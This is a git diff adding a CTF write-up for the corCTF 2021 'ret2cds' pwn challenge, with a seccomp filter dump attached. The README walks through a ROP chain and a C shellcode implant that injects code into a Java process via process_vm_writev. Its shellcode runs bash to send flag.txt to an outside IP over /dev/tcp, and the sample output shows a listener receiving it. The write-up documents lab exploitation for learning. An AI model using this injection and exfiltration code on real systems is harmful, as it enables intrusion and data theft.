diff --git a/2021/corctf/ret2cds/.gitignore b/2021/corctf/ret2cds/.gitignore new file mode 100644 index 0000000..ba99e13 --- /dev/null +++ b/2021/corctf/ret2cds/.gitignore @@ -0,0 +1,2 @@ +implant.bin +implant.elf diff --git a/2021/corctf/ret2cds/README.md b/2021/corctf/ret2cds/README.md new file mode 100644 index 0000000..1636e06 --- /dev/null +++ b/2021/corctf/ret2cds/README.md 
@@ -0,0 +1,519 @@ +# ret2cds + +by [haskal](https://awoo.systems) + +pwn / 497 pts / 6 solves + +>Pwners keep joking about dropping socat and xinetd 0 days so I rewrote netcat in java. I dare you +>to pop a shell on me now :^) +> +>https://ret2cds.be.ax/ +> +>NOTE: Internet is enabled, please use the provided qemu image, and note that this has been tested to +>work in a Debian environment for the Docker host. An Ubuntu host is known to have issues with the +>official solution for the challenge. If you are on Debian, the docker deployment should work for you +>if you don't want to use the qemu image (but not guaranteed). +> +>QEMU Image: ret2cds-qemu.qcow2.gz +> +>QEMU Example: qemu-system-x86_64 -enable-kvm -serial mon:stdio -hda ret2cds.qcow2 -nographic -smp 1 +>-m 1G -net user,hostfwd=tcp::1337-:1337 -net nic +> +>QEMU Username: root (no password) +> +>Docker: ret2cds.tar + +provided files (i'm only providing the binaries here not the whole qemu image cause that is huge): +[ret2cds/](ret2cds/) + +## solution + +pwn time + +basic analysis of the binary shows that it is using seccomp (also, there is seccomp on the docker +image used for the challenge, but the binary's seccomp rules are much more restrictive) + +here's the main function in the dragn + +![main function, it's literally just a 512 byte read into a 256 byte buffer](main.png) + +yea + +ok so first let's get the seccomp rules. for this i used + and just like, had it run the binary, (yes i probably +shouldn't be running CTF binaries on my actual machine but shush) + +this produces output [analysis/ret2cds-seccomp.txt](analysis/ret2cds-seccomp.txt). well... most +things are banned + +so what isn't banned? 
since the docker contains its own seccomp config, we cross-reference what is +allowed there with what is banned here and find 2 interesting calls which are allowed by both sets +of configurations + +- `process_vm_readv` +- `process_vm_writev` + +these are syscalls that allow reading and writing another process's memory given we have ptrace +permission (in docker everything is root, and also the docker config explicitly adds the ptrace +capability, so yes) + +## initial pwning + +ok we'll get to this later. first we need to bonk the ret2cds process. it's pretty standard just +write the address of write in order to leak the libc base, then jump back to main, then make a +second rop chain to call mmap in libc + +well this part got kind of weird, because pwntools ROP could not identify a good gadget to get +control of r9 which was needed to be set to 0 since it's the offset parameter for mmap (r8 garbage +is OK, it gets ignored for anonymous maps by the kernel). so i turn to my trusty uber-ROP gadget +which is `setcontext` (it's a libc call for restoring all registers from a struct on the stack, goes +with `getcontext`). by manual analysis there is a good place to jump into `setcontext` in order to +get control of r9 + +```asm +// ( in setcontext ) +001581e1 4c 8b 4a 30 MOV R9,qword ptr [RDX + 0x30] +001581e5 48 8b 92 MOV RDX,qword ptr [RDX + 0x88] + 88 00 00 00 +001581ec 31 c0 XOR EAX,EAX +001581ee c3 RET +``` + +for this we just need `RDX` to be loaded as a pointer to the memory we want to load from, which is +easy cause we have gadgets for `RDX`. 
we pass in a pointer to some random part of `rodata` such that +the address `r9` gets loaded from ends up being `0` + +here's the code so far + +```python +elf = ELF("./ret2cds") +rop = ROP(elf) +rop.write(1, elf.got['write']) + +libc = ELF("./libc.so.6") + +r = remote("ret2cds.be.ax", 38255) +r.recvuntil("warden: ") + +# step 1: get write to print the address of write, then go back to main (0x0040123a) +r.sendline(b"A"*256 + b"AAAAAAAA" + rop.chain() + p64(0x0040123a)) +print(r.recvline()) +print(r.recvline()) +leak = r.recvline()[1:8] +leak = u64(leak.ljust(8, b'\x00')) +print(hex(leak)) + +libc_base = leak - libc.symbols['write'] +print(hex(libc_base)) + +libc.address = libc_base + +# now, make part of the ROP for mmap with pwntools +libc_rop = ROP(libc) +# memorize these args lol, that's +# - addr +# - size +# - 7: PROT_READ | PROT_WRITE | PROT_EXECUTE +# - 0x32: MAP_ANONYMOUS | MAP_FIXED | MAP_PRIVATE +# - -1: no fd +# - 0: no offset +libc_rop.mmap(0x133713370000, 0x10000, 7, 0x32) #, -1, 0) +# read moar shellcode into it +libc_rop.read(0, 0x133713370000, 0x10000) + +# handle those pesky remaining args (well, just the last one) +# see the assembly for this gadget above +fucky_r9_gadget = p64(0x581e1 + libc_base) +# load rdx with a pointer to rodata (convenient source of 0x0s) offset so that r9 gets +pre_rop = ROP(libc) +pre_rop.rdx = 0x402008 - 0x30 + +# send step 2 exploit, then jump to the shellcode we just mapped +r.sendline(b"A"*256 + b"AAAAAAAA" + pre_rop.chain() + fucky_r9_gadget + libc_rop.chain() + p64(0x133713370000)) +``` + +now we have shellcode. but there's still seccomp..... + +we can produce the final shellcode tho. 
it just won't work yet because execve is not allowed +(neither is like, anything bash would be running here) + +```python +stage3 = asm(shellcraft.amd64.linux.execve("/bin/bash", ["/bin/bash", "-c", "touch /tmp/hax; cat flag.txt > /dev/tcp/44.44.127.10/1337"], {})) +``` + +please note: if you are doing CTFs in the future referencing this writeup, make sure to keep the IP +address `44.44.127.10` so that i get yr flags >:3 + +ok so the path should be clear: use `process_vm_writev` in order to write _more shellcode_ into +_another process_ + +the only other process is the java netcat replacement + +yikes, + +the java code itself is not that interesting, and not exploitable as far as i can tell. if you're +interested, you can take a look in [Bytecode Viewer](https://github.com/Konloch/bytecode-viewer) or +[JDA](https://github.com/LLVM-but-worse/java-disassembler)[^1] + +from looking at that quickly on the qemu environment, we find something interesting in +`/proc//maps` for the java process + +``` +800000000-800002000 rwxp 00001000 fe:00 3441489 /usr/lib/jvm/java-11-openjdk-amd64/lib/server/classes.jsa +800002000-8003b9000 rw-p 00003000 fe:00 3441489 /usr/lib/jvm/java-11-openjdk-amd64/lib/server/classes.jsa +8003b9000-800a95000 r--p 003ba000 fe:00 3441489 /usr/lib/jvm/java-11-openjdk-amd64/lib/server/classes.jsa +800a95000-800a96000 rw-p 00a96000 fe:00 3441489 /usr/lib/jvm/java-11-openjdk-amd64/lib/server/classes.jsa +800a96000-8010a3000 r--p 00a97000 fe:00 3441489 /usr/lib/jvm/java-11-openjdk-amd64/lib/server/classes.jsa +``` + +`classes.jsa` has an `rwx` mapping at what looks like a fixed address... that's a great target for +shellcode[^2] + +i'm not super interested in shellcoding a call to `process_vm_writev` ... would be convenient to +write it in C, but i also don't have or want to have (legitimate or illegitimate) a binja license +for their shellcode compiler... 
+ +## how 2 make a C implant 2021 tutorial working (no robux) + +set it to 136 bpm + +make a linker script. it's gonna start at the address where your `mmap` shellcode page is + +```ld +ENTRY(_start) + +MEMORY +{ + RAM (rwx) : ORIGIN = 0x133713370000, LENGTH = 0x10000 +} + +SECTIONS +{ + .text : + { + *(.text.start) + *(.text*) + } + + .rodata : + { + *(.rodata*) + } + + .data : + { + *(.data*) + } + + .bss : + { + _bss = .; + *(.bss*) + *(COMMON) + _ebss = .; + } +} +``` + +now make a makefile (for convenience). we want to call gcc with the magic spell `-nostdlib +-nodefaultlibs -nostdinc -fpic -fno-stack-protector -Os -T stage2.ld` + +basically that's +- don't use any stdlib or standard headers +- make position independent code, skip the stack protector +- optimize for size +- use the given linker script + +then objcopy that into a flat binary + +```make +.PHONY: all clean copy + +CC=gcc +OBJCOPY=objcopy + +all: implant.bin + +clean: + $(RM) *.bin *.elf + +implant.bin: implant.elf + $(OBJCOPY) -O binary $< $@ + +implant.elf: stage2.c stage2.ld + $(CC) -nostdlib -nodefaultlibs -nostdinc -T stage2.ld -fpic -fno-stack-protector \ + -Os -std=gnu11 -Wall -Wextra -o $@ $< +``` + +add some reverb, and stack the layers + +here's some boilerplate C. fun fact, your entrypoint just needs to be at the beginning and it needs +to wipe `.bss` then jump to main. 
but we also need to redefine literally everything because we opted +to not have any standard headers (this is technically unnecessary, you can use the headers if you +want) + +```c +typedef unsigned char uint8_t; +_Static_assert(sizeof(uint8_t) == 1, "uint8_t wrong size"); +typedef unsigned short uint16_t; +_Static_assert(sizeof(uint16_t) == 2, "uint16_t wrong size"); +typedef unsigned int uint32_t; +_Static_assert(sizeof(uint32_t) == 4, "uint32_t wrong size"); +typedef unsigned long long uint64_t; +_Static_assert(sizeof(uint64_t) == 8, "uint64_t wrong size"); +typedef unsigned int size_t; +typedef int ssize_t; + +#define NULL ((void*)0x0) +#define pid_t unsigned long +#define true 1 +#define false 0 +#define SYS_exit 1 +#define SYS_read 0 +#define SYS_write 1 +#define SYS_process_vm_readv 310 +#define SYS_process_vm_writev 311 + +int main(); +void __attribute__((noreturn)) exit(int); + +void* memset(void* dst, int val, size_t size) { + for (size_t i = 0; i < size; i++) { + ((uint8_t*)dst)[i] = val; + } + return dst; +} + +void* memcpy(void* dst, const void* src, size_t size) { + for (size_t i = 0; i < size; i++) { + ((uint8_t*)dst)[i] = ((uint8_t*)src)[i]; + } + return dst; +} + +extern uint8_t _bss; +extern uint8_t _ebss; +void __attribute__((noreturn)) __attribute__((section(".text.start"))) _start() { + // wipe .bss + memset(&_bss, 0, (&_ebss) - (&_bss)); + // go to main! + exit(main()); +} + +int main() { + // your code here!!! 
+ while(true){} + return 120; +} +``` + +ok now that's done, write some syscall wrappers (i'm being very extra with this) + +```c +ssize_t read(int _fd, void* _buf, size_t _len) { + register int fd asm("rdi") = _fd; + register void* buf asm("rsi") = _buf; + register size_t len asm("rdx") = _len; + register int syscall asm("rax") = SYS_read; + register ssize_t ret asm("rax"); + asm volatile("syscall" : "=r"(ret) : "r"(fd), "r"(buf), "r"(len), "r"(syscall) : "memory"); + return ret; +} + +void write(int _fd, const void* _buf, size_t _len) { + register int fd asm("rdi") = _fd; + register const void* buf asm("rsi") = _buf; + register size_t len asm("rdx") = _len; + register int syscall asm("rax") = SYS_write; + asm volatile("syscall" :: "r"(fd), "r"(buf), "r"(len), "r"(syscall) : "memory"); +} + +void __attribute__((noreturn)) exit(int _code) { + register int code asm("rdi") = _code; + register int syscall asm("rax") = SYS_exit; + asm volatile("syscall" :: "r"(code), "r"(syscall) : "memory"); + __builtin_unreachable(); +} + +ssize_t process_vm_readv(pid_t _pid, + const struct iovec *_local_iov, + unsigned long _liovcnt, + const struct iovec *_remote_iov, + unsigned long _riovcnt, + unsigned long _flags) { + register pid_t pid asm("rdi") = _pid; + register struct iovec* local_iov asm("rsi") = _local_iov; + register unsigned long liovcnt asm("rdx") = _liovcnt; + register struct iovec* remote_iov asm("r10") = _remote_iov; + register unsigned long riovcnt asm("r8") = _riovcnt; + register unsigned long flags asm("r9") = _flags; + register int syscall asm("rax") = SYS_process_vm_readv; + register ssize_t ret asm("rax"); + asm volatile("syscall" : "=r"(ret) : "r"(pid), "r"(local_iov), "r"(liovcnt), "r"(remote_iov), + "r"(riovcnt), "r"(flags), "r"(syscall) : "memory"); + return ret; +} + +ssize_t process_vm_writev(pid_t _pid, + const struct iovec *_local_iov, + unsigned long _liovcnt, + const struct iovec *_remote_iov, + unsigned long _riovcnt, + unsigned long _flags) { + 
register pid_t pid asm("rdi") = _pid; + register struct iovec* local_iov asm("rsi") = _local_iov; + register unsigned long liovcnt asm("rdx") = _liovcnt; + register struct iovec* remote_iov asm("r10") = _remote_iov; + register unsigned long riovcnt asm("r8") = _riovcnt; + register unsigned long flags asm("r9") = _flags; + register int syscall asm("rax") = SYS_process_vm_writev; + register ssize_t ret asm("rax"); + asm volatile("syscall" : "=r"(ret) : "r"(pid), "r"(local_iov), "r"(liovcnt), "r"(remote_iov), + "r"(riovcnt), "r"(flags), "r"(syscall) : "memory"); + return ret; +} +``` + +ok _now_ we're ready to send the shellcode using `process_vm_writev` + +## how 2 iovec 2021 tutorial working (no robux) + +so if you've never seen iovecs (first of all you should try kernel pwn, you'll definitely see +iovecs,) basically it's a way to read and/or write multiple addresses in sequence with one syscall. +you pass in an array of these structs + +```c +struct iovec { + void *iov_base; /* Starting address */ + size_t iov_len; /* Number of bytes to transfer */ +}; +``` + +that's how `process_vm_readv` and `process_vm_writev` are working + +now there's one more small detail, which is that we don't know what PID java has. 
luckily it's low +(usually <10) so we can just spray the shellcode at every process and eventually java will be hit + +```c +// this is: asm(shellcraft.amd64.linux.execve("/bin/bash", ["/bin/bash", "-c", "touch /tmp/hax; cat flag.txt > /dev/tcp/35.237.4.96/1337"], {})) +char* buf = "shellcode here"; +char buf2[0x2000]; + +// write to the previously determined rwx pages in the java process +struct iovec remote_vec = { (void*)0x800000000, 0x2000 }; +// read from a local shellcode buf +struct iovec local_vec = { &buf2[0], 0x2000 }; + +int main() { + print("implant is booted\n"); + + // fill nop sled (0x90 is NOP) + memset(buf2, 0x90, 0x2000); + // add the shellcode at the end + memcpy(&buf2[0x2000 - 186], buf, 186); + + for (int i = 2; i < 100; i++) { + print("sending to pid:"); + print_int(i); + print("\n"); + ssize_t ret = process_vm_writev(i, &local_vec, 1, &remote_vec, 1, 0); + if (ret <= 0) { + print("bad ret!: "); + print_int(-ret); + print("\n"); + } else { + print("GOOD RET\n"); + break; + } + } + print("injection complete\n"); + while(true){} + return 120; +} +``` + +finally you'll probably need to connect to the endpoint again, in order to trigger the java process +to enter the rwx page and execute your shellcode + +the results: +``` +❯ python3 exploit.py +[*] '.../ret2cds' + Arch: amd64-64-little + RELRO: Full RELRO + Stack: No canary found + NX: NX enabled + PIE: No PIE (0x3ff000) + RUNPATH: b'./' +[*] Loaded 14 cached gadgets for '../challenge/chall/ret2cds' +0x0000: 0x40131b pop rdi; ret +0x0008: 0x1 [arg0] rdi = 1 +0x0010: 0x401319 pop rsi; pop r15; ret +0x0018: 0x403fc0 [arg1] rsi = got.write +0x0020: b'iaaajaaa' +0x0028: 0x401030 write +[*] '.../libc.so.6' + Arch: amd64-64-little + RELRO: Partial RELRO + Stack: Canary found + NX: NX enabled + PIE: PIE enabled +0x111040 +[+] Opening connection to ret2cds.be.ax on port 34485: Done +b'\x00\n' +b"lol, you ain't escaping...\n" +0x7f5b8856e040 +0x7f5b8845d000 +[*] Loaded 200 cached gadgets for 
'../challenge/chall/libc.so.6' +0x0000: 0x7f5b8856256d pop rdx; pop rcx; pop rbx; ret +0x0008: 0x7 [arg2] rdx = 7 +0x0010: 0x32 [arg3] rcx = 50 +0x0018: b'gaaahaaa' +0x0020: 0x7f5b88484529 pop rsi; ret +0x0028: 0x10000 [arg1] rsi = 65536 +0x0030: 0x7f5b88483b72 pop rdi; ret +0x0038: 0x133713370000 [arg0] rdi = 21127266500608 +0x0040: 0x7f5b88578890 mmap +0x0048: 0x7f5b885791e1 pop rdx; pop r12; ret +0x0050: 0x10000 [arg2] rdx = 65536 +0x0058: b'waaaxaaa' +0x0060: 0x7f5b88484529 pop rsi; ret +0x0068: 0x133713370000 [arg1] rsi = 21127266500608 +0x0070: 0x7f5b88483b72 pop rdi; ret +0x0078: 0x0 [arg0] rdi = 0 +0x0080: 0x7f5b8856dfa0 read +b'm%V\x88[\x7f\x00\x00\x07\x00\x00\x00\x00\x00\x00\x002\x00\x00\x00\x00\x00\x00\x00gaaahaaa)EH\x88[\x7f\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00r;H\x88[\x7f\x00\x00\x00\x007\x137\x13\x00\x00\x90\x88W\x88[\x7f\x00\x00\xe1\x91W\x88[\x7f\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00waaaxaaa) +EH\x88[\x7f\x00\x00\x00\x007\x137\x13\x00\x00r;H\x88[\x7f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xa0\xdfV\x88[\x7f\x00\x00' +make: Nothing to be done for 'all'. +[*] Switching to interactive mode +🚨 Due to the recent security breaches, we have no choice but to lock you up in jail! 🚨 +And just to avoid all those socat/xinetd 0-days you and your pwn friends brag about... +I rewrote netcat in Java ☕. +Nothing can go wrong with a language used on over 13 billion devices ™. + +\x00nter your appeal to the warden: \x00 +lol, you ain't escaping... +\x00[*] Got EOF while reading in interactive +$ +[*] Closed connection to ret2cds.be.ax port 34485 +[*] Got EOF while sending in interactive +``` + +meanwhile on yr listening server +``` +$ while true; do nc -vlp 1337; done +Ncat: Version 7.70 ( https://nmap.org/ncat ) +Ncat: Listening on :::1337 +Ncat: Listening on 0.0.0.0:1337 +Ncat: Connection from 161.35.128.177. +Ncat: Connection from 161.35.128.177:43098. 
+corctf{r0p_t0_5h3llc0d3_t0_pWn1n1g_j@v@_rwX_cDs_af179e546321dfac13370} +``` + +(idk what the 'cds' part of the challege name is supposed to mean. return to 💿?) + +[^1]: JDA is just a cleaned up and slightly prettified fork of Bytecode Viewer, but it's also behind + Bytecode Viewer in terms of a few features (mainly Android) + +[^2]: in recent versions of openjdk, this is no longer the case (i think). sad :( + luckily this challenge is using an older version diff --git a/2021/corctf/ret2cds/analysis/ret2cds-seccomp.txt b/2021/corctf/ret2cds/analysis/ret2cds-seccomp.txt new file mode 100644 index 0000000..340e123 --- /dev/null +++ b/2021/corctf/ret2cds/analysis/ret2cds-seccomp.txt 
@@ -0,0 +1,651 @@ + line CODE JT JF K +================================= + 0000: 0x20 0x00 0x00 0x00000004 A = arch + 0001: 0x15 0x01 0x00 0xc000003e if (A == ARCH_X86_64) goto 0003 + 0002: 0x06 0x00 0x00 0x00000000 return KILL + 0003: 0x20 0x00 0x00 0x00000000 A = sys_number + 0004: 0x35 0x00 0x01 0x40000000 if (A < 0x40000000) goto 0006 + 0005: 0x06 0x00 0x00 0x00000000 return KILL + 0006: 0x15 0x00 0x01 0x00000002 if (A != open) goto 0008 + 0007: 0x06 0x00 0x00 0x00000000 return KILL + 0008: 0x15 0x00 0x01 0x00000003 if (A != close) goto 0010 + 0009: 0x06 0x00 0x00 0x00000000 return KILL + 0010: 0x15 0x00 0x01 0x00000004 if (A != stat) goto 0012 + 0011: 0x06 0x00 0x00 0x00000000 return KILL + 0012: 0x15 0x00 0x01 0x00000005 if (A != fstat) goto 0014 + 0013: 0x06 0x00 0x00 0x00000000 return KILL + 0014: 0x15 0x00 0x01 0x00000006 if (A != lstat) goto 0016 + 0015: 0x06 0x00 0x00 0x00000000 return KILL + 0016: 0x15 0x00 0x01 0x00000007 if (A != poll) goto 0018 + 0017: 0x06 0x00 0x00 0x00000000 return KILL + 0018: 0x15 0x00 0x01 0x00000008 if (A != lseek) goto 0020 + 0019: 0x06 0x00 0x00 0x00000000 return KILL + 0020: 0x15 0x00 0x01 0x0000000c if (A != brk) goto 0022 + 0021: 0x06 0x00 0x00 0x00000000 return KILL + 0022: 0x15 0x00 0x01 0x0000000d if (A != rt_sigaction) goto 0024 + 0023: 0x06 0x00 0x00 0x00000000 return KILL + 0024: 0x15 0x00 0x01 0x0000000e if (A != rt_sigprocmask) goto 0026 + 0025: 0x06 0x00 0x00 0x00000000 return KILL + 0026: 0x15 0x00 0x01 0x0000000f if (A != rt_sigreturn) goto 0028 + 0027: 0x06 0x00 0x00 0x00000000 return KILL + 0028: 0x15 0x00 0x01 0x00000010 if (A != ioctl) goto 0030 + 0029: 0x06 0x00 0x00 0x00000000 return KILL + 0030: 0x15 0x00 0x01 0x00000011 if (A != pread64) goto 0032 + 0031: 0x06 0x00 0x00 0x00000000 return KILL + 0032: 0x15 0x00 0x01 0x00000012 if (A != pwrite64) goto 0034 + 0033: 0x06 0x00 0x00 0x00000000 return KILL + 0034: 0x15 0x00 0x01 0x00000013 if (A != readv) goto 0036 + 0035: 0x06 0x00 0x00 0x00000000 return KILL 
+ 0036: 0x15 0x00 0x01 0x00000014 if (A != writev) goto 0038 + 0037: 0x06 0x00 0x00 0x00000000 return KILL + 0038: 0x15 0x00 0x01 0x00000015 if (A != access) goto 0040 + 0039: 0x06 0x00 0x00 0x00000000 return KILL + 0040: 0x15 0x00 0x01 0x00000016 if (A != pipe) goto 0042 + 0041: 0x06 0x00 0x00 0x00000000 return KILL + 0042: 0x15 0x00 0x01 0x00000017 if (A != select) goto 0044 + 0043: 0x06 0x00 0x00 0x00000000 return KILL + 0044: 0x15 0x00 0x01 0x00000018 if (A != sched_yield) goto 0046 + 0045: 0x06 0x00 0x00 0x00000000 return KILL + 0046: 0x15 0x00 0x01 0x00000019 if (A != mremap) goto 0048 + 0047: 0x06 0x00 0x00 0x00000000 return KILL + 0048: 0x15 0x00 0x01 0x0000001a if (A != msync) goto 0050 + 0049: 0x06 0x00 0x00 0x00000000 return KILL + 0050: 0x15 0x00 0x01 0x0000001b if (A != mincore) goto 0052 + 0051: 0x06 0x00 0x00 0x00000000 return KILL + 0052: 0x15 0x00 0x01 0x0000001c if (A != madvise) goto 0054 + 0053: 0x06 0x00 0x00 0x00000000 return KILL + 0054: 0x15 0x00 0x01 0x0000001d if (A != shmget) goto 0056 + 0055: 0x06 0x00 0x00 0x00000000 return KILL + 0056: 0x15 0x00 0x01 0x0000001e if (A != shmat) goto 0058 + 0057: 0x06 0x00 0x00 0x00000000 return KILL + 0058: 0x15 0x00 0x01 0x0000001f if (A != shmctl) goto 0060 + 0059: 0x06 0x00 0x00 0x00000000 return KILL + 0060: 0x15 0x00 0x01 0x00000020 if (A != dup) goto 0062 + 0061: 0x06 0x00 0x00 0x00000000 return KILL + 0062: 0x15 0x00 0x01 0x00000021 if (A != dup2) goto 0064 + 0063: 0x06 0x00 0x00 0x00000000 return KILL + 0064: 0x15 0x00 0x01 0x00000022 if (A != pause) goto 0066 + 0065: 0x06 0x00 0x00 0x00000000 return KILL + 0066: 0x15 0x00 0x01 0x00000023 if (A != nanosleep) goto 0068 + 0067: 0x06 0x00 0x00 0x00000000 return KILL + 0068: 0x15 0x00 0x01 0x00000024 if (A != getitimer) goto 0070 + 0069: 0x06 0x00 0x00 0x00000000 return KILL + 0070: 0x15 0x00 0x01 0x00000025 if (A != alarm) goto 0072 + 0071: 0x06 0x00 0x00 0x00000000 return KILL + 0072: 0x15 0x00 0x01 0x00000026 if (A != setitimer) goto 0074 + 0073: 
0x06 0x00 0x00 0x00000000 return KILL + 0074: 0x15 0x00 0x01 0x00000027 if (A != getpid) goto 0076 + 0075: 0x06 0x00 0x00 0x00000000 return KILL + 0076: 0x15 0x00 0x01 0x00000028 if (A != sendfile) goto 0078 + 0077: 0x06 0x00 0x00 0x00000000 return KILL + 0078: 0x15 0x00 0x01 0x00000029 if (A != socket) goto 0080 + 0079: 0x06 0x00 0x00 0x00000000 return KILL + 0080: 0x15 0x00 0x01 0x0000002a if (A != connect) goto 0082 + 0081: 0x06 0x00 0x00 0x00000000 return KILL + 0082: 0x15 0x00 0x01 0x0000002b if (A != accept) goto 0084 + 0083: 0x06 0x00 0x00 0x00000000 return KILL + 0084: 0x15 0x00 0x01 0x0000002c if (A != sendto) goto 0086 + 0085: 0x06 0x00 0x00 0x00000000 return KILL + 0086: 0x15 0x00 0x01 0x0000002d if (A != recvfrom) goto 0088 + 0087: 0x06 0x00 0x00 0x00000000 return KILL + 0088: 0x15 0x00 0x01 0x0000002e if (A != sendmsg) goto 0090 + 0089: 0x06 0x00 0x00 0x00000000 return KILL + 0090: 0x15 0x00 0x01 0x0000002f if (A != recvmsg) goto 0092 + 0091: 0x06 0x00 0x00 0x00000000 return KILL + 0092: 0x15 0x00 0x01 0x00000030 if (A != shutdown) goto 0094 + 0093: 0x06 0x00 0x00 0x00000000 return KILL + 0094: 0x15 0x00 0x01 0x00000031 if (A != bind) goto 0096 + 0095: 0x06 0x00 0x00 0x00000000 return KILL + 0096: 0x15 0x00 0x01 0x00000032 if (A != listen) goto 0098 + 0097: 0x06 0x00 0x00 0x00000000 return KILL + 0098: 0x15 0x00 0x01 0x00000033 if (A != getsockname) goto 0100 + 0099: 0x06 0x00 0x00 0x00000000 return KILL + 0100: 0x15 0x00 0x01 0x00000034 if (A != getpeername) goto 0102 + 0101: 0x06 0x00 0x00 0x00000000 return KILL + 0102: 0x15 0x00 0x01 0x00000035 if (A != socketpair) goto 0104 + 0103: 0x06 0x00 0x00 0x00000000 return KILL + 0104: 0x15 0x00 0x01 0x00000036 if (A != setsockopt) goto 0106 + 0105: 0x06 0x00 0x00 0x00000000 return KILL + 0106: 0x15 0x00 0x01 0x00000037 if (A != getsockopt) goto 0108 + 0107: 0x06 0x00 0x00 0x00000000 return KILL + 0108: 0x15 0x00 0x01 0x00000038 if (A != clone) goto 0110 + 0109: 0x06 0x00 0x00 0x00000000 return KILL + 0110: 
0x15 0x00 0x01 0x00000039 if (A != fork) goto 0112 + 0111: 0x06 0x00 0x00 0x00000000 return KILL + 0112: 0x15 0x00 0x01 0x0000003a if (A != vfork) goto 0114 + 0113: 0x06 0x00 0x00 0x00000000 return KILL + 0114: 0x15 0x00 0x01 0x0000003b if (A != execve) goto 0116 + 0115: 0x06 0x00 0x00 0x00000000 return KILL + 0116: 0x15 0x00 0x01 0x0000003d if (A != wait4) goto 0118 + 0117: 0x06 0x00 0x00 0x00000000 return KILL + 0118: 0x15 0x00 0x01 0x0000003e if (A != kill) goto 0120 + 0119: 0x06 0x00 0x00 0x00000000 return KILL + 0120: 0x15 0x00 0x01 0x0000003f if (A != uname) goto 0122 + 0121: 0x06 0x00 0x00 0x00000000 return KILL + 0122: 0x15 0x00 0x01 0x00000040 if (A != semget) goto 0124 + 0123: 0x06 0x00 0x00 0x00000000 return KILL + 0124: 0x15 0x00 0x01 0x00000041 if (A != semop) goto 0126 + 0125: 0x06 0x00 0x00 0x00000000 return KILL + 0126: 0x15 0x00 0x01 0x00000042 if (A != semctl) goto 0128 + 0127: 0x06 0x00 0x00 0x00000000 return KILL + 0128: 0x15 0x00 0x01 0x00000043 if (A != shmdt) goto 0130 + 0129: 0x06 0x00 0x00 0x00000000 return KILL + 0130: 0x15 0x00 0x01 0x00000044 if (A != msgget) goto 0132 + 0131: 0x06 0x00 0x00 0x00000000 return KILL + 0132: 0x15 0x00 0x01 0x00000045 if (A != msgsnd) goto 0134 + 0133: 0x06 0x00 0x00 0x00000000 return KILL + 0134: 0x15 0x00 0x01 0x00000046 if (A != msgrcv) goto 0136 + 0135: 0x06 0x00 0x00 0x00000000 return KILL + 0136: 0x15 0x00 0x01 0x00000047 if (A != msgctl) goto 0138 + 0137: 0x06 0x00 0x00 0x00000000 return KILL + 0138: 0x15 0x00 0x01 0x00000048 if (A != fcntl) goto 0140 + 0139: 0x06 0x00 0x00 0x00000000 return KILL + 0140: 0x15 0x00 0x01 0x00000049 if (A != flock) goto 0142 + 0141: 0x06 0x00 0x00 0x00000000 return KILL + 0142: 0x15 0x00 0x01 0x0000004a if (A != fsync) goto 0144 + 0143: 0x06 0x00 0x00 0x00000000 return KILL + 0144: 0x15 0x00 0x01 0x0000004b if (A != fdatasync) goto 0146 + 0145: 0x06 0x00 0x00 0x00000000 return KILL + 0146: 0x15 0x00 0x01 0x0000004c if (A != truncate) goto 0148 + 0147: 0x06 0x00 0x00 
0x00000000 return KILL + 0148: 0x15 0x00 0x01 0x0000004d if (A != ftruncate) goto 0150 + 0149: 0x06 0x00 0x00 0x00000000 return KILL + 0150: 0x15 0x00 0x01 0x0000004e if (A != getdents) goto 0152 + 0151: 0x06 0x00 0x00 0x00000000 return KILL + 0152: 0x15 0x00 0x01 0x0000004f if (A != getcwd) goto 0154 + 0153: 0x06 0x00 0x00 0x00000000 return KILL + 0154: 0x15 0x00 0x01 0x00000050 if (A != chdir) goto 0156 + 0155: 0x06 0x00 0x00 0x00000000 return KILL + 0156: 0x15 0x00 0x01 0x00000051 if (A != fchdir) goto 0158 + 0157: 0x06 0x00 0x00 0x00000000 return KILL + 0158: 0x15 0x00 0x01 0x00000052 if (A != rename) goto 0160 + 0159: 0x06 0x00 0x00 0x00000000 return KILL + 0160: 0x15 0x00 0x01 0x00000053 if (A != mkdir) goto 0162 + 0161: 0x06 0x00 0x00 0x00000000 return KILL + 0162: 0x15 0x00 0x01 0x00000054 if (A != rmdir) goto 0164 + 0163: 0x06 0x00 0x00 0x00000000 return KILL + 0164: 0x15 0x00 0x01 0x00000055 if (A != creat) goto 0166 + 0165: 0x06 0x00 0x00 0x00000000 return KILL + 0166: 0x15 0x00 0x01 0x00000056 if (A != link) goto 0168 + 0167: 0x06 0x00 0x00 0x00000000 return KILL + 0168: 0x15 0x00 0x01 0x00000057 if (A != unlink) goto 0170 + 0169: 0x06 0x00 0x00 0x00000000 return KILL + 0170: 0x15 0x00 0x01 0x00000058 if (A != symlink) goto 0172 + 0171: 0x06 0x00 0x00 0x00000000 return KILL + 0172: 0x15 0x00 0x01 0x00000059 if (A != readlink) goto 0174 + 0173: 0x06 0x00 0x00 0x00000000 return KILL + 0174: 0x15 0x00 0x01 0x0000005a if (A != chmod) goto 0176 + 0175: 0x06 0x00 0x00 0x00000000 return KILL + 0176: 0x15 0x00 0x01 0x0000005b if (A != fchmod) goto 0178 + 0177: 0x06 0x00 0x00 0x00000000 return KILL + 0178: 0x15 0x00 0x01 0x0000005c if (A != chown) goto 0180 + 0179: 0x06 0x00 0x00 0x00000000 return KILL + 0180: 0x15 0x00 0x01 0x0000005d if (A != fchown) goto 0182 + 0181: 0x06 0x00 0x00 0x00000000 return KILL + 0182: 0x15 0x00 0x01 0x0000005e if (A != lchown) goto 0184 + 0183: 0x06 0x00 0x00 0x00000000 return KILL + 0184: 0x15 0x00 0x01 0x0000005f if (A != umask) 
